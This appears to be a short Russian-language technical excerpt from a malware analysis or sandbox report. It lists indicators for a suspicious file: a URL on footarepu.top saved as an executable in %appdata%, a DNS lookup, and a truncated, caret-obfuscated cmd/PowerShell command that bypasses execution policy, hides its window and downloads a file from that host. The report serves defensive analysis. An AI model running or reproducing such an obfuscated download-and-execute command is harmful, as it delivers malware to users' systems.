Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^owersh^E^LL.ExE^ -E^xEc^U^t^IONp^O^L^icY^ ^ByPA^Ss^ -^NO^p^RofiLe -windOwstYlE^ HI^D^D^EN^ (N^Ew^-o^bjECT ^S^Yste^M^.^NET.W^E^b^cLiENt^).dOWn^LO^ADfIl^e^(^'http://footarepu...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "P^owersh^E^LL.ExE^ -E^xEc^U^t^IONp^O^L^icY^ ^ByPA^Ss^ -^NO^p^RofiLe -windOwstYlE^ HI^D^D^EN^ (N^Ew^-o^bjECT ^S^Yste^M^.^NET.W^E^b^cLiENt^).dOWn^LO^ADfIl^e^(^'http://footarepu...' (со скрытым окном)